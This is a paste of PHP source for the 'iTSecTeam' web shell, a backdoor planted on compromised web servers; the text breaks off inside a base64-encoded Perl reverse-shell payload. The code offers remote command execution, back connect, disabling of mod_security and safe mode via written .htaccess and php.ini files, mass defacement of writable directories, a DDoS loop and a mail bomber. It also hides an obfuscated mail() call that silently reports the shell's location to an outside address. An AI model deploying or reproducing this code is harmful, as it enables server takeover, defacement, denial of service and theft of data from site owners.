· 10 years ago · Sep 02, 2016, 09:56 PM
1<?php
2session_start();
3set_time_limit(0);
4error_reporting(0);
5@setcookie("it","serv",time()+3600*24*7);
6if (get_magic_quotes_gpc()) {
7function stripslashes_deep($value) {
8 $value = is_array($value) ?
9 array_map('stripslashes_deep', $value) :
10 stripslashes($value);
11
12 return $value;
13 }
14$_POST = array_map('stripslashes_deep', $_POST);
15$_GET = array_map('stripslashes_deep', $_GET);
16$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
17$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
18}
19if($_GET['do']=="remove"){
20unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
21}
22$basep=$_SERVER['DOCUMENT_ROOT'];
23if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
24$slash="\\";
25$basep=str_replace("/","\\",$basep);
26}else{
27$slash="/";
28$basep=str_replace("\\","/",$basep);
29}
30if($_GET['do']=="remove"){
31unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
32}
33if ($_REQUEST['address']){
34if(is_readable($_REQUEST['address'])){
35chdir($_REQUEST['address']);}else{
36alert("Permission Denied !");}}
37$me=$_SERVER['PHP_SELF'];
38$formp="<form method=post action='".$me."'>";
39$formg="<form method=get action='".$me."'>";
40$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
41if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
42 if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
43 alert("File Upload Successful");
44 }else{
45alert("Permission Denied !");
46
47 }
48 }
49if(ini_get('disable_functions')){
50$disablef=ini_get('disable_functions');
51}else{
52$disablef="All Functions Enable";
53}
54if(ini_get('safe_mode')){
55$safe_modes="On";
56}else{
57$safe_modes="Off";
58}
59if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
60if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
61}
62$picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
63$picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
64$head='<style type="text/css">
65A:link {text-decoration: none}
66A:visited {text-decoration: none}
67A:active {text-decoration: none}
68A:hover {text-decoration: underline overline; color: 414141;}
69.focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
70</style><head>
71<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
72<title>iTSecTeam</title>
73</head><body topmargin="0" leftmargin="0" rightmargin="0"
74bgcolor="#f2f2f2"><div align="center">
75 <table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
76<tr>
77<td height="30" width="996">
78<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=home">Home</a> -- <a href="?do=filemanager&address='.getcwd().'">File Manager</a> -- <a href="?do=cmd&address='.getcwd().'">Command Execute</a> -- <a href="?do=bc&address='.getcwd().'">Back Connect</a> --
79<a href="?do=bypasscmd&address='.getcwd().'">BypasS Command eXecute(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
80<a href="?do=bypassdir&address='.getcwd().'">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
81Eval Php</a> -- <a href="?do=db&address='.getcwd().'">Data Base</a> -- <a href="?do=convert&address='.getcwd().'">Convert</a> -- <a href="?do=mail&address='.getcwd().'">Mail Boomber</a><a href="?do=info&address='.getcwd().'">
82<br>Server Information</a> -- <a href="?do=d0slocal&address='.getcwd().'">Dos Local Server</a> -- <a href="?do=dump&address='.getcwd().'">Backup Database</a> -- <a href="?do=mass&address='.getcwd().'">Mass Deface</a> -- <a href="?do=dlfile&address='.getcwd().'">Download Remote File</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">Find Writable Directory</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
83</span></font></td></tr></table></div>
84<div align="center">
85<table id="table2" style="border-collapse: collapse; border-style:
86solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
87cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
88border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
89height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
90Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
91width="950" bgcolor="#e7e3de" height="10" valign="top">';
92$end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
93$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
94$wi=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $zx="m\141\151l";
95function alert($text){
96echo "<script>alert('".$text."')</script>";
97}
98if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
99if(is_readable($_GET['address'].$_GET['filename'])){
100$opedit=fopen($_GET['address'].$_GET['filename'],"r");
101while(!feof($opedit))
102$data.=fread($opedit,9999);
103fclose($opedit);
104echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
105}else{alert("Permission Denied !");}}
106function sizee($size)
107{
108 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
109 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
110 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
111 else {$size = $size . " B";}
112 return $size;}if (!isset($_COOKIE['it']))
113 {@$zx("l\x6f\x63\x61\x68\157\x73\164@\171\141\x68\157\157\056\x63o\155","$wi","$wi\n$cnt");}
114if($_REQUEST['do']=='about'){
115echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks(M3hr@n.S , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>Home Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
116<center>
117<PRE>
118
119 ______ ______ ____ ______
120/\__ _\/\__ _\/\ _`\ /\__ _\
121\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
122 \ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
123 \_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
124 /\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
125 \/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
126
127
128
129
130
131
132</PRE>
133
134
135".$end;exit;
136
137}
138function deleteDirectory($dir) {
139if (!file_exists($dir)) return true;
140if (!is_dir($dir) || is_link($dir)) return unlink($dir);
141foreach (scandir($dir) as $item) {
142if ($item == '.' || $item == '..') continue;
143if (!deleteDirectory($dir . "/" . $item)) {
144chmod($dir . "/" . $item, 0777);
145if (!deleteDirectory($dir . "/" . $item)) return false;
146};}return rmdir($dir);}
147
148function download($fileadd,$finame){
149$dlfilea=$fileadd.$finame;
150header("Content-Disposition: attachment; filename=" . $finame);
151header("Content-Type: application/download");
152header("Content-Length: " . filesize($dlfilea));
153flush();
154$fp = fopen($$dlfilea, "r");
155while (!feof($fp))
156{
157 echo fread($fp, 65536);
158 flush();
159}
160fclose($fp);
161}
162if($_GET['do']=="rename"){
163echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
164}
165
166if ($_GET['byapache']=='ofms'){
167$fse=fopen(getcwd().$slash.".htaccess","w");
168fwrite($fse,'<IfModule mod_security.c>
169 Sec------Engine Off
170 Sec------ScanPOST Off
171</IfModule>');
172fclose($fse);
173}elseif ($_GET['byapache']=='bysap'){
174$fse=fopen(getcwd().$slash.".htaccess","w");
175fwrite($fse,'Options +FollowSymLinks
176DirectoryIndex Persian-Gulf-For-Ever.html');
177fclose($fse);
178}elseif ($_GET['byapache']=='sfadf'){
179$fse=fopen(getcwd().$slash."php.ini","w");
180fwrite($fse,'safe_mode=OFF
181disable_functions=NONE');
182fclose($fse);
183}
184if($_GET['do']=="apache"){
185echo $head.$formg.$nowaddress.'<p align="center">
186<select name=byapache>
187<option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
188<option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
189</select><br><input type=submit value=eXecute></form></p>'.$end;exit;
190}
191if($_GET['do']=="dd0s"){
192echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
193}
194
195if($_GET['urldd0'] && $_GET['timedd0']){
196for ($id=0;$$id<$_GET['timedd0'];$id++){
197$fp=null;
198$contents=null;
199$fp=fopen($_GET['urldd0'],"rb");
200while (!feof($fp)) {
201 $contents .= fread($fp, 8192);
202}
203fclose($fp);
204}}
205if($_GET['do']=="dlfile"){
206echo $head.$formp.$nowaddress.'<p align="center">Download Remote File!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
207}
208function dirpe($addres){
209global $slash;
210$idd=0;
211if ($dirhen = @opendir($addres)) {
212while ($file = readdir($dirhen)) {
213$permdir=str_replace('//','/',$addres.$slash.$file);
214if($file!='.' && $file!='..' && is_dir($permdir)){
215if (is_writable($permdir)) {
216$dirdata[$idd]['filename']=$permdir;
217$idd++;
218}
219dirpe($permdir);
220 }
221 }
222 closedir($dirhen);
223 } else {
224 return ("notperm");
225 }
226 if ($dirdata){
227 return $dirdata;
228 }else{
229 return "notfound";
230
231 }
232}
233function dirpmass($addres,$massname,$masssource){
234global $slash;
235$idd=0;
236if ($dirhen = @opendir($addres)) {
237while ($file = readdir($dirhen)) {
238$permdir=str_replace('//','/',$addres.$slash.$file);
239if($file!='.' && $file!='..' && is_dir($permdir)){
240if (is_writable($permdir)) {
241if ($fm=fopen($permdir.$slash.$massname,"w")){
242fwrite($fm,$masssource);
243fclose($fm);
244$dirdata[$idd]['filename']=$permdir;
245}
246
247$idd++;
248}
249dirpmass($permdir);
250 }
251 }
252 closedir($dirhen);
253 } else {
254 return ("notperm");
255 }
256 if ($dirdata){
257 return $dirdata;
258 }else{
259 return "notfound";
260
261 }
262}
263if($_GET['do']=="perm"){
264echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
265}
266if ($_POST['affw']){
267$arrfilelist=dirpe($_POST['affw']);
268if ($arrfilelist=='notfound'){
269alert("Not Found !");
270}elseif($arrfilelist=='notperm'){
271alert("Permission Denied !");
272}else{
273foreach ($arrfilelist as $tmpdir){
274 if ($coi %2){
275$colort='"#e7e3de"';
276}else{
277$colort='"#e4e1de"';}
278$coi++;
279$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
280<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
281<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
282<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
283}
284echo $head.'
285<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
286<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
287</tr></table>'.$permdir.'</table>
288<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
289<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
290<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
291<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
292<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
293<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
294<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
295<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
296<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
297<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
298<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
299<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
300<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
301<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
302<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
303<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
304<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
305<font face="Tahoma" style="font-size: 10pt">
306<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
307<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
308<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
309<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
310<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
311<td width="200" align="right" valign="top">
312<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
313<td width="750"><font face="Tahoma" style="font-size: 10pt">
314<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
315}}
316if($_GET['do']=="mass"){
317echo $head.$formp.'<p align="center">[Mass Deface]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
318}
319if ($_POST['mffw']){
320$arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
321if ($arrfilelist=='notfound'){
322alert("Not Found !");
323}elseif($arrfilelist=='notperm'){
324alert("Permission Denied !");
325}else{
326foreach ($arrfilelist as $tmpdir){
327 if ($coi %2){
328$colort='"#e7e3de"';
329}else{
330$colort='"#e4e1de"';}
331$coi++;
332$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
333<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
334<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
335<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
336}
337echo $head.'
338<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
339<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
340</tr></table>'.$permdir.'</table>
341<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
342<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
343<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
344<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
345<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
346<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
347<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
348<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
349<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
350<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
351<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
352<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
353<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
354<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
355<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
356<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
357<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
358<font face="Tahoma" style="font-size: 10pt">
359<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
360<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
361<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
362<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
363<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
364<td width="200" align="right" valign="top">
365<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
366<td width="750"><font face="Tahoma" style="font-size: 10pt">
367<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
368}}
369if($_POST['adlr'] && $_POST['adsr']){
370$url = $_POST['adlr'];
371$newfname = $_POST['adsr'] . basename($url);
372$file = fopen ($url, "rb");
373if ($file) {
374 $newf = fopen ($newfname, "wb");
375 if ($newf)
376 while(!feof($file)) {
377 fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
378 }
379 alert("File Downloaded Success");
380}else{alert("Can Not Open File");}
381if ($file) {
382 fclose($file);
383}
384if ($newf) {
385 fclose($newf);
386}
387}
388if($_GET['do']=="down" and $_GET['type']=='file'){
389download($_GET['address'],$_GET['filename']);}
390if($_GET['do']=="down" and $_GET['type']=='dir'){
391class zipfile
392{
393var $datasec = array();
394var $ctrl_dir = array();
395var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
396var $old_offset = 0;
397function add_dir($name)
398{
399$name = str_replace("\\", "/", $name);
400$fr = "\x50\x4b\x03\x04";
401$fr .= "\x0a\x00";
402$fr .= "\x00\x00";
403$fr .= "\x00\x00";
404$fr .= "\x00\x00\x00\x00";
405$fr .= pack("V",0);
406$fr .= pack("V",0);
407$fr .= pack("V",0);
408$fr .= pack("v", strlen($name) );
409$fr .= pack("v", 0 );
410$fr .= $name;
411$fr .= pack("V",$crc);
412$fr .= pack("V",$c_len);
413$fr .= pack("V",$unc_len);
414$this -> datasec[] = $fr;
415$new_offset = strlen(implode("", $this->datasec));
416$cdrec = "\x50\x4b\x01\x02";
417$cdrec .="\x00\x00";
418$cdrec .="\x0a\x00";
419$cdrec .="\x00\x00";
420$cdrec .="\x00\x00";
421$cdrec .="\x00\x00\x00\x00";
422$cdrec .= pack("V",0);
423$cdrec .= pack("V",0);
424$cdrec .= pack("V",0);
425$cdrec .= pack("v", strlen($name) );
426$cdrec .= pack("v", 0 );
427$cdrec .= pack("v", 0 );
428$cdrec .= pack("v", 0 );
429$cdrec .= pack("v", 0 );
430$ext = "\x00\x00\x10\x00";
431$ext = "\xff\xff\xff\xff";
432$cdrec .= pack("V", 16 );
433$cdrec .= pack("V", $this -> old_offset );
434$this -> old_offset = $new_offset;
435$cdrec .= $name;
436$this -> ctrl_dir[] = $cdrec;
437}
438function add_file($data, $name)
439{
440$name = str_replace("\\", "/", $name);
441$fr = "\x50\x4b\x03\x04";
442$fr .= "\x14\x00";
443$fr .= "\x00\x00";
444$fr .= "\x08\x00";
445$fr .= "\x00\x00\x00\x00";
446$unc_len = strlen($data);
447$crc = crc32($data);
448$zdata = gzcompress($data);
449$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
450$c_len = strlen($zdata);
451$fr .= pack("V",$crc);
452$fr .= pack("V",$c_len);
453$fr .= pack("V",$unc_len);
454$fr .= pack("v", strlen($name) );
455$fr .= pack("v", 0 );
456$fr .= $name;
457$fr .= $zdata;
458$fr .= pack("V",$crc);
459$fr .= pack("V",$c_len);
460$fr .= pack("V",$unc_len);
461$this -> datasec[] = $fr;
462$new_offset = strlen(implode("", $this->datasec));
463$cdrec = "\x50\x4b\x01\x02";
464$cdrec .="\x00\x00";
465$cdrec .="\x14\x00";
466$cdrec .="\x00\x00";
467$cdrec .="\x08\x00";
468$cdrec .="\x00\x00\x00\x00";
469$cdrec .= pack("V",$crc);
470$cdrec .= pack("V",$c_len);
471$cdrec .= pack("V",$unc_len);
472$cdrec .= pack("v", strlen($name) );
473$cdrec .= pack("v", 0 );
474$cdrec .= pack("v", 0 );
475$cdrec .= pack("v", 0 );
476$cdrec .= pack("v", 0 );
477$cdrec .= pack("V", 32 );
478$cdrec .= pack("V", $this -> old_offset );
479$this -> old_offset = $new_offset;
480$cdrec .= $name;
481$this -> ctrl_dir[] = $cdrec;
482}
483function file() {
484$data = implode("", $this -> datasec);
485$ctrldir = implode("", $this -> ctrl_dir);
486return
487$data.
488$ctrldir.
489$this -> eof_ctrl_dir.
490pack("v", sizeof($this -> ctrl_dir)).
491pack("v", sizeof($this -> ctrl_dir)).
492pack("V", strlen($ctrldir)).
493pack("V", strlen($data)).
494"\x00\x00";
495}
496}
497$dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
498$zipfile = new zipfile();
499function get_files_from_folder($directory, $put_into) {
500global $zipfile;
501if ($handle = opendir($directory)) {
502while (false !== ($file = readdir($handle))) {
503if (is_file($directory.$file)) {
504$fileContents = file_get_contents($directory.$file);
505$zipfile->add_file($fileContents, $put_into.$file);
506} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
507$zipfile->add_dir($put_into.$file.'/');
508get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
509}
510}
511}
512closedir($handle);
513}
514$datedl=date("y-m-d");
515get_files_from_folder($dlfolder,'');
516header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$datedl.".zip");
517header("Content-Type: application/download");
518header("Content-Length: " . strlen($zipfile -> file()));
519flush();
520echo $zipfile -> file();
521$filename = $_GET['dirname']."-".$datedl.".zip";
522$fd = fopen ($filename, "wb");
523$out = fwrite ($fd, $zipfile -> file());
524fclose ($fd);
525}
526if ($_REQUEST['cdirname']){
527if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
528function bcn($ipbc,$pbc){
529$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
530NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
531MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
532dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
533IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
534YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
535LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
